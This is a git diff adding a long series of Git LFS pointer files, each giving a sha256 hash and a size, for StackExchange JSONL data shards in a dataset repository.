0000000000000000000000000000000000000000..ec0b435966ab723c6396039075f1a6c4910f0baa --- /dev/null +++ b/data/stackexchange/1-1/1027_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c697733e8fb5558eb2d783440be50a77b310c73aee0dbdd6ae0456cbdee27bf8 +size 34915186 diff --git a/data/stackexchange/1-1/1028_2289.jsonl b/data/stackexchange/1-1/1028_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21d0d2220f0327a0785d3792a86a26e802c4bacc --- /dev/null +++ b/data/stackexchange/1-1/1028_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c6444c6ea5d05988f54a9f1660e51998c31115d0a744759338a91507fabd3cd +size 35208519 diff --git a/data/stackexchange/1-1/1029_2289.jsonl b/data/stackexchange/1-1/1029_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fcaf3b9b3a42a3738797990216badd1135b39ce9 --- /dev/null +++ b/data/stackexchange/1-1/1029_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19a1a3dcf36b77d3c211f47aee91b9275676caa40c71df8f1a9c2997028a969a +size 34952584 diff --git a/data/stackexchange/1-1/102_2289.jsonl b/data/stackexchange/1-1/102_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a519a3e7195148d68ed534711e067aa40cbde292 --- /dev/null +++ b/data/stackexchange/1-1/102_2289.jsonl @@ -0,0 +1,3 @@ +version 
https://git-lfs.github.com/spec/v1 +oid sha256:df9fe22cb420a3269d423f7f427cbca10c61c8c6846cd81cfb451fcc884a1268 +size 33657694 diff --git a/data/stackexchange/1-1/1030_2289.jsonl b/data/stackexchange/1-1/1030_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a71d57b52f19d77c64233d9e18127e6b696b4aed --- /dev/null +++ b/data/stackexchange/1-1/1030_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb273495992300ddc6e64be95b3b9dedef6676521c3f70256c931b4066142aea +size 35532031 diff --git a/data/stackexchange/1-1/1031_2289.jsonl b/data/stackexchange/1-1/1031_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d7f5f72ccacd1ac816d4208046a277de1d5d06c --- /dev/null +++ b/data/stackexchange/1-1/1031_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b6f76d69f90532411ad3f111ddf7e2b3345fd0d7facee6ba3379ed60ec88d73 +size 35150643 diff --git a/data/stackexchange/1-1/1032_2289.jsonl b/data/stackexchange/1-1/1032_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e12dbd6c693ec0c2fefd782d181c40a4d36d7e6b --- /dev/null +++ b/data/stackexchange/1-1/1032_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:269e1aee0142a563182969724be2b9aa21fba0dc3672eedddc4593b666f8d46c +size 34934648 diff --git a/data/stackexchange/1-1/1033_2289.jsonl b/data/stackexchange/1-1/1033_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2135bdde427ff4d7cad1f33d82c29323d46d79c0 --- /dev/null +++ b/data/stackexchange/1-1/1033_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62d6ebaeb97c6499ff3cb5d44b3d987edffa5ceead290283265cda08b3d1c508 +size 35138645 diff --git a/data/stackexchange/1-1/1034_2289.jsonl b/data/stackexchange/1-1/1034_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c521667712a8b2f2cd785880000d320564c29171 --- /dev/null +++ b/data/stackexchange/1-1/1034_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b23b39bb0ee58324b10aa32a3b019b184e786214d89734c532d347c8053290e +size 35099056 diff --git a/data/stackexchange/1-1/1035_2289.jsonl b/data/stackexchange/1-1/1035_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..48fac43748557b26648ef096f7db1af992231c0a --- /dev/null +++ b/data/stackexchange/1-1/1035_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a00ef5b709b3ff851c4fd6168d28de0090924adb7d19dc84c9b317f96499583d +size 34954239 diff --git a/data/stackexchange/1-1/1036_2289.jsonl b/data/stackexchange/1-1/1036_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6eca7c3d3b0e82ccd51445e3783c3cd7485c91e3 --- /dev/null +++ b/data/stackexchange/1-1/1036_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e619a8bbaf2a9b17e282ee4abcea40b5895af05e7f0b2043d931ebb180e857ad +size 35654447 diff --git a/data/stackexchange/1-1/1037_2289.jsonl b/data/stackexchange/1-1/1037_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..077c12e32b6d1b26448c401be78df0206e9dc6e2 --- /dev/null +++ b/data/stackexchange/1-1/1037_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6c331e6b51d255b725f198ef196e306471a6c22306319b616945d5c9564bbe9 +size 34813728 diff --git a/data/stackexchange/1-1/1038_2289.jsonl b/data/stackexchange/1-1/1038_2289.jsonl new file mode 100644 
index 0000000000000000000000000000000000000000..8622486e2864dcdbea00f79803083d294c3820ad --- /dev/null +++ b/data/stackexchange/1-1/1038_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c39d2012da6b40c659b913a723b38494759c3638a94949a0747d599be345f67 +size 35200091 diff --git a/data/stackexchange/1-1/1039_2289.jsonl b/data/stackexchange/1-1/1039_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b550b013429ed7dabf933a397eac90f13689efec --- /dev/null +++ b/data/stackexchange/1-1/1039_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:574791d6fbc036025196b55b2b9cc691961144bb9b25e751788ba7ce667302e7 +size 35773132 diff --git a/data/stackexchange/1-1/103_2289.jsonl b/data/stackexchange/1-1/103_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c096c88983aa9eba9537d8f029d408d1426e6605 --- /dev/null +++ b/data/stackexchange/1-1/103_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:397b2c44ece5d0af68a59402f03517d483ce9cb224a8407ac229c29ceb3c53e1 +size 34079466 diff --git a/data/stackexchange/1-1/1040_2289.jsonl b/data/stackexchange/1-1/1040_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a81e71a8f2145c39320aaf96cd9e0a5ca1d776a1 --- /dev/null +++ b/data/stackexchange/1-1/1040_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6c4d8eb8301c460964e706c951cfd8f84f9473c55b401a096069ffb6fbf4ba6 +size 34853128 diff --git a/data/stackexchange/1-1/1041_2289.jsonl b/data/stackexchange/1-1/1041_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ff076c0d667129d723bc8147d73ae6f3d6e7fe79 --- /dev/null +++ b/data/stackexchange/1-1/1041_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19f61478c288c1324ba1b1275d451750d34cbbf02e49b52593a913cb0dbe8bcf +size 35053678 diff --git a/data/stackexchange/1-1/1042_2289.jsonl b/data/stackexchange/1-1/1042_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5aced532454b32d0a0d44d9f9108c00c10c89ad9 --- /dev/null +++ b/data/stackexchange/1-1/1042_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2eb3ef5b359c64c144782141cd6fedd4f82f2c8a074a0a26ea823742e0daf5e +size 35661742 diff --git a/data/stackexchange/1-1/1043_2289.jsonl b/data/stackexchange/1-1/1043_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..08b43f201767cece4e24a94a3d271f2f229d63f3 --- /dev/null +++ b/data/stackexchange/1-1/1043_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f01fca7b6b159eede65c3f447cec538adf67418547005f6fae8cc950674d9ef +size 35176925 diff --git a/data/stackexchange/1-1/1044_2289.jsonl b/data/stackexchange/1-1/1044_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d3c41fe66de9bb4512a27a5311d26096f015d578 --- /dev/null +++ b/data/stackexchange/1-1/1044_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4e39ad945fb3fb12c81f789fd93c9e5d595d55cbe4f184b4cdf65a294ed97175 +size 35111989 diff --git a/data/stackexchange/1-1/1045_2289.jsonl b/data/stackexchange/1-1/1045_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a70a9559538ff3d845f4559450622c16f258c06 --- /dev/null +++ b/data/stackexchange/1-1/1045_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:fcbba44cce5ba0bf8987e31abbc107f7a9d880fe2392d7dcd38e825136e5f9d8 +size 35180869 diff --git a/data/stackexchange/1-1/1046_2289.jsonl b/data/stackexchange/1-1/1046_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cb7ac3737d5ad362008634a855cdb71bcb7998d2 --- /dev/null +++ b/data/stackexchange/1-1/1046_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:59a599adbcda299613140a98902f1dbb8dc1b775f02f86da5347cd0b61a21ad2 +size 34833656 diff --git a/data/stackexchange/1-1/1047_2289.jsonl b/data/stackexchange/1-1/1047_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8af56bf7618e9bb241e7ff2df7c55ebf6ead5122 --- /dev/null +++ b/data/stackexchange/1-1/1047_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e4d17d789afd559f92f0693bfb06538526049f05b5404ce2e5221aa09f491db +size 35309291 diff --git a/data/stackexchange/1-1/1048_2289.jsonl b/data/stackexchange/1-1/1048_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cfe8414d4927f7d44a2a85ce5ff47499844bd411 --- /dev/null +++ b/data/stackexchange/1-1/1048_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c1df16e43ec698ee9698a239224d31a1588d48c9c5eeb8861eb8bd6cdcd82a5 +size 35254623 diff --git a/data/stackexchange/1-1/1049_2289.jsonl b/data/stackexchange/1-1/1049_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8fd1881e557473dadd14b389a3f11ae8abafcd7c --- /dev/null +++ b/data/stackexchange/1-1/1049_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7252dfab66b7b2bbb1c97f347ebcfa53ed96f2e2d926fb67073e5171b8ddc67b +size 35098547 diff --git a/data/stackexchange/1-1/104_2289.jsonl b/data/stackexchange/1-1/104_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0701ca7372149933b220933862cda463097d5d74 --- /dev/null +++ b/data/stackexchange/1-1/104_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7ff6fe2b36696d4121b6652a53694440093756dc94ea2f3504ef60f79e57d1ee +size 33910563 diff --git a/data/stackexchange/1-1/1050_2289.jsonl b/data/stackexchange/1-1/1050_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8f5bc8182bb5915940ddafebb0c943ce7bdb537d --- /dev/null +++ b/data/stackexchange/1-1/1050_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9306ab659ee76824d4de15da470fca22ca010bd46e5506648df5a1826396c0ed +size 38166314 diff --git a/data/stackexchange/1-1/1051_2289.jsonl b/data/stackexchange/1-1/1051_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..29af2e2346b6e36f55994c3daeef0564b3e48620 --- /dev/null +++ b/data/stackexchange/1-1/1051_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe971e9e325ea06a8f442652f1f080ffd20d91e84c309de3dc1d1d1750a4c41c +size 37712845 diff --git a/data/stackexchange/1-1/1052_2289.jsonl b/data/stackexchange/1-1/1052_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c7210cbe2ad285fdfba9f9ac2aae1f7a4f81dfe7 --- /dev/null +++ b/data/stackexchange/1-1/1052_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5852bbc231338689d2d165d233d614bbe8b21b26b5ca576aeea07110001cdc8a +size 38254874 diff --git a/data/stackexchange/1-1/1053_2289.jsonl b/data/stackexchange/1-1/1053_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..69ad9663c199d4d3633a6bf3dd9c0ff665aa8a0b --- /dev/null +++ b/data/stackexchange/1-1/1053_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bbea0b43f35e52615f98eaf3b037a9794102903e75626bc193932f9bc140f086 +size 38809630 diff --git a/data/stackexchange/1-1/1054_2289.jsonl b/data/stackexchange/1-1/1054_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0ebdf386003e240b1dac7eff3ec3eb1ad353e44 --- /dev/null +++ b/data/stackexchange/1-1/1054_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:66e6efb8b58d894322c790ae61fe247eee8cd0c155edf0faefa73d413d2ba8ee +size 37914487 diff --git a/data/stackexchange/1-1/1055_2289.jsonl b/data/stackexchange/1-1/1055_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ae8a79837c3386d380cd36d0de48ee2e880949d --- /dev/null +++ b/data/stackexchange/1-1/1055_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c115d7f5448d376db741184c2373e820bdb685e7f3ba37114c7b6a868f871441 +size 38035994 diff --git a/data/stackexchange/1-1/1056_2289.jsonl b/data/stackexchange/1-1/1056_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cca7f45eb57a0448222abde7901f3bf0d37db54e --- /dev/null +++ b/data/stackexchange/1-1/1056_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b6049e786815dcbd8b785927feaf205ad8edd6f011970f6af5afaab999fca3b +size 37451840 diff --git a/data/stackexchange/1-1/1057_2289.jsonl b/data/stackexchange/1-1/1057_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4910d8bf1b550fd48d1c0ae38e01d12d7674dc9f --- /dev/null +++ b/data/stackexchange/1-1/1057_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a048ffc6108c0858d8acb72c4cf11e3ca0aad511ee27c5c846adb595aecdd1fa +size 38568306 diff --git a/data/stackexchange/1-1/1058_2289.jsonl b/data/stackexchange/1-1/1058_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..142b315eec1986a1a801c352debb8f0e66779a8b --- /dev/null +++ b/data/stackexchange/1-1/1058_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f66424a74634c699470f197ac8ee0b4bcdbaebb5ed85e1988a8874400b97113f +size 37852221 diff --git a/data/stackexchange/1-1/1059_2289.jsonl b/data/stackexchange/1-1/1059_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f1836dc53e8c761565488bcadce742274ab8acc --- /dev/null +++ b/data/stackexchange/1-1/1059_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7c605dbcf9c4fb7d2933a7272616cf4b000e63a39cd80c4874ebb72766c22bab +size 37936798 diff --git a/data/stackexchange/1-1/105_2289.jsonl b/data/stackexchange/1-1/105_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3615cee92c4e92db34e9a7e24364c50e5fe66d17 --- /dev/null +++ b/data/stackexchange/1-1/105_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:60dfd696f920d6cb897210620039ea7b5ae36d179ecea212b7cf8b9d6f38f9bc +size 33556922 diff --git a/data/stackexchange/1-1/1060_2289.jsonl b/data/stackexchange/1-1/1060_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..819cee6fb6748c2c705b25626f5c61f8d947d3c8 --- /dev/null +++ b/data/stackexchange/1-1/1060_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:ba63305d9046f5d6a9a20f1d34abf04a0b0a59b0eed7335af47ad09032fc739b +size 38451666 diff --git a/data/stackexchange/1-1/1061_2289.jsonl b/data/stackexchange/1-1/1061_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6a5b6d0797e59b88fee400f563813cb355511848 --- /dev/null +++ b/data/stackexchange/1-1/1061_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5dcc4b5a20954922566a8e2b70ba2dd289970df5f21172a1dcefe1c9d3f1a17 +size 38507253 diff --git a/data/stackexchange/1-1/1062_2289.jsonl b/data/stackexchange/1-1/1062_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..184bc10934abb6c847fea25b4676001455a35d21 --- /dev/null +++ b/data/stackexchange/1-1/1062_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:813609f14507561bb56df06b4211ae1d6152256ae0caabd36df42299cae1bfce +size 37881163 diff --git a/data/stackexchange/1-1/1063_2289.jsonl b/data/stackexchange/1-1/1063_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..191fcfebcf96f2fffca06c1d455567d309f5620e --- /dev/null +++ b/data/stackexchange/1-1/1063_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:365a712fc11b3c9849fa65a1a558d6f8c003ff22a14c562cc78cae9fa581f716 +size 37750108 diff --git a/data/stackexchange/1-1/1064_2289.jsonl b/data/stackexchange/1-1/1064_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dad08886953b26659fb0ee40105a7365fcb682f3 --- /dev/null +++ b/data/stackexchange/1-1/1064_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af47ba4deae178789843fddec7efa005d80dd2f24a3f0ead0d61973643574df4 +size 37760441 diff --git a/data/stackexchange/1-1/1065_2289.jsonl b/data/stackexchange/1-1/1065_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2c6c9cd3b593791bd50193fe0da9cd01f8c1955 --- /dev/null +++ b/data/stackexchange/1-1/1065_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71d7e8d00c2a0cbccaed83bf5b24ea244bd37bbf854d1ee7cd3d97df455a2e45 +size 37408442 diff --git a/data/stackexchange/1-1/1066_2289.jsonl b/data/stackexchange/1-1/1066_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a7f935ddf7b7b2834a7831a672607130c1c2c831 --- /dev/null +++ b/data/stackexchange/1-1/1066_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1309ab71805751ce67678b1bf106423b22dfd173aaefcb0ca59704469bf0cfc6 +size 38664448 diff --git a/data/stackexchange/1-1/1067_2289.jsonl b/data/stackexchange/1-1/1067_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd3b5928348fe1c1a9407ddf9c92bf20fa5f2f43 --- /dev/null +++ b/data/stackexchange/1-1/1067_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a5b754c7064730ec67936e3b1e21828ea09f7ff5ee2a79774dd8952fb8bbba6 +size 37768588 diff --git a/data/stackexchange/1-1/1068_2289.jsonl b/data/stackexchange/1-1/1068_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5ecb11702a8acfe5e133b3e54105b679449f9bb1 --- /dev/null +++ b/data/stackexchange/1-1/1068_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7ce8d26ab48d9651d472bea01c1274257c32195866563c671566192857cdbfde +size 37514758 diff --git a/data/stackexchange/1-1/1069_2289.jsonl b/data/stackexchange/1-1/1069_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..0b1c01c90a04fd496cff10441fac21fbd742dc4c --- /dev/null +++ b/data/stackexchange/1-1/1069_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ce20a73ad6d4dd8cb3916500ed44c4e84a1bf40fe13799e3129d8fc0520311e +size 38065902 diff --git a/data/stackexchange/1-1/106_2289.jsonl b/data/stackexchange/1-1/106_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..880f5612a6199c18c87dc6d972bc2dd05cfb5528 --- /dev/null +++ b/data/stackexchange/1-1/106_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b2e04b58e5ecd960220a49a7ec88ba826431d821ac3985002287fcc66ac7cde +size 34124473 diff --git a/data/stackexchange/1-1/1070_2289.jsonl b/data/stackexchange/1-1/1070_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..949e992fbf1ab159be14f9f1b16da26cee311c84 --- /dev/null +++ b/data/stackexchange/1-1/1070_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ec0de66a37a76c741532c576770709aa6ded0e8607c4efa7f953c4b761a6a7a +size 38200860 diff --git a/data/stackexchange/1-1/1071_2289.jsonl b/data/stackexchange/1-1/1071_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b73abd69acec06791d8645e6c2c1de986a723849 --- /dev/null +++ b/data/stackexchange/1-1/1071_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:270c49e8b80f7db15dc168d4e6383d206eb4b39a69f3d9fe2c96838623483ca1 +size 37849154 diff --git a/data/stackexchange/1-1/1072_2289.jsonl b/data/stackexchange/1-1/1072_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7eb351fc74ca86e40104e5b6f81840d21144a4df --- /dev/null +++ b/data/stackexchange/1-1/1072_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ac0d463c8bb02724e6a7d12062bd4df29d0c190baa879956904b0ca54e1a4e6b +size 38090538 diff --git a/data/stackexchange/1-1/1073_2289.jsonl b/data/stackexchange/1-1/1073_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f1ac3fbddcd05fd93c832d78eac0224f20d148c4 --- /dev/null +++ b/data/stackexchange/1-1/1073_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0a0d152186d4c1d4101fee53da52fa2461c6a6cb9719abd9d1141b8f1c5793d +size 37873255 diff --git a/data/stackexchange/1-1/1074_2289.jsonl b/data/stackexchange/1-1/1074_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1273308bd1e3803e3aef45f8498a01f86799178d --- /dev/null +++ b/data/stackexchange/1-1/1074_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c4ee55ca1deb65fac1bbe09df29309eed5e6dfe56170da1a8a61d4cab0a697e +size 38336733 diff --git a/data/stackexchange/1-1/1075_2289.jsonl b/data/stackexchange/1-1/1075_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7f43624f73762ce3c52d3a654c502359b302182b --- /dev/null +++ b/data/stackexchange/1-1/1075_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:39ca84e88a819177dbdddaca09aa2934bbf092fae34d0b35a5d5d787234b215c +size 38402649 diff --git a/data/stackexchange/1-1/1076_2289.jsonl b/data/stackexchange/1-1/1076_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83e6992214913c285c91d5188225ae19fa51291b --- /dev/null +++ b/data/stackexchange/1-1/1076_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:eb1ff6ab231cfd77e232e13bc4ae13f091789783f542a4f4a2de270bbb117c11 +size 37985820 diff --git a/data/stackexchange/1-1/1077_2289.jsonl b/data/stackexchange/1-1/1077_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca904d210802c52478f0e7bdd0668a5fddf44d13 --- /dev/null +++ b/data/stackexchange/1-1/1077_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42b3f11f032c1b66e5855cf5f2c658ebfa8a18b0a6fd73c8a0fde3c8ea674de9 +size 37319391 diff --git a/data/stackexchange/1-1/1078_2289.jsonl b/data/stackexchange/1-1/1078_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4cac0ee4cfd9e7dfc1280ab6466e65b806dae5c8 --- /dev/null +++ b/data/stackexchange/1-1/1078_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6fc1eb5d15938c75aee695f81c2bbd296e1dff8a358193e3c21e3904573d5700 +size 37931604 diff --git a/data/stackexchange/1-1/1079_2289.jsonl b/data/stackexchange/1-1/1079_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b7003f6f4508560fdeab173f320ec06f2fd0974 --- /dev/null +++ b/data/stackexchange/1-1/1079_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d6cea9f648559feb9bfe5b006820e62259e1b5f70b637b8a7c31444fb94c8a2 +size 38092648 diff --git a/data/stackexchange/1-1/107_2289.jsonl b/data/stackexchange/1-1/107_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3201e2e3f7620008639d84515acc8f2920f5e911 --- /dev/null +++ b/data/stackexchange/1-1/107_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:449d3f0f6178d2ff145b292e199d2aa337b196e1a05312c7cbfed08bebb853b7 +size 33409016 diff --git a/data/stackexchange/1-1/1080_2289.jsonl b/data/stackexchange/1-1/1080_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eac993bb9f6801e26a2578a18d40ffb852f981e3 --- /dev/null +++ b/data/stackexchange/1-1/1080_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b620f89d47bf8e9291febf2384a3939f7fbd991e12765dfc915cafb49935d117 +size 37540111 diff --git a/data/stackexchange/1-1/1081_2289.jsonl b/data/stackexchange/1-1/1081_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1eb477fa3db45b6575dc80f146695422559f210d --- /dev/null +++ b/data/stackexchange/1-1/1081_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c815ac104b93da0cb1df265551a6acd8773c118759d0d1bef0f91880358d536b +size 38121864 diff --git a/data/stackexchange/1-1/1082_2289.jsonl b/data/stackexchange/1-1/1082_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..71747ad9c639f672527dfa7691e1089f719ea2ab --- /dev/null +++ b/data/stackexchange/1-1/1082_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:174bcbca37623ae8254cd9942b16a142bd2b9bac9dc989d901bc5fd96f63bd23 +size 38365793 diff --git a/data/stackexchange/1-1/1083_2289.jsonl b/data/stackexchange/1-1/1083_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..edc69013c7af48a4f92b2b72585fc8c845b7eb58 --- /dev/null +++ b/data/stackexchange/1-1/1083_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a68c0e5197ad0b6f001f0634ee304334500f07c63e8e3ed4c80656563ac2b3b7 +size 37597737 diff --git a/data/stackexchange/1-1/1084_2289.jsonl b/data/stackexchange/1-1/1084_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..f6fd1c6e584eb11c26566210c3199f7ddfdf81d8 --- /dev/null +++ b/data/stackexchange/1-1/1084_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:999d8f7ddaf0895bf8d1fdbe7af6534206dfb25b35c40d43bf31ebf5be249685 +size 38505555 diff --git a/data/stackexchange/1-1/1085_2289.jsonl b/data/stackexchange/1-1/1085_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4cd7ca0a8748fa21758bdb088755796450e527bf --- /dev/null +++ b/data/stackexchange/1-1/1085_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6f46f6e2f141dd638704672663601ab4fe6124120c9e78572f698f2b4b835bc3 +size 37818147 diff --git a/data/stackexchange/1-1/1086_2289.jsonl b/data/stackexchange/1-1/1086_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf917e1ae26ebd25747d24ef627f34fa9c6e65e3 